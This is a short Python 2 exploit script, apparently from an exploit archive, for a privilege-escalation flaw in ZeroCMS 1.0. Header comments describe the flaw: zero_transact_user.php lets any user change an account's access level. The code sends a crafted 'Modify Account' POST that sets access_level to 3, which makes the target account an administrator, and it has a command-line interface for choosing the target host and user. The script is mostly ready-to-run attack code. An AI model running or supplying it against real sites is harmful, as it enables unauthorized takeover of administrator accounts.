import sys,getopt,cookielib,urllib2,urllib
# ZeroCMS 1.0
# zero_transact_user.php
# Impropper Form post hanling, (parameter polution)
# Vendor: Another Awesome Stuff
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# the script zero_transact_user.php contains a Modify Account case
# where the execution context doen't have in to consideration the current user's permitions
# allowing a malcious user to escalate its privileges to admin.
def exploit(host,email,name,userid):
access_level = 3 # default for admin
url = host + '/zero_transact_user.php' #the script handles user related actions
args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
data = urllib.urlencode(args)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open(url,data);
print response.read()
def main(argv):
host = ''
email = ''
accountname = ''
userid = ''
try:
opts, args = getopt.getopt(argv,"hu:m:n:i:")
except getopt.GetoptError:
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit()
elif opt in ("-u"):
host = arg
elif opt in ("-m"):
email = arg
elif opt in ("-n"):
accountname = arg
elif opt in ("-i"):
userid = arg
exploit(host,email,accountname,userid)
if __name__ == "__main__":
main(sys.argv[1:])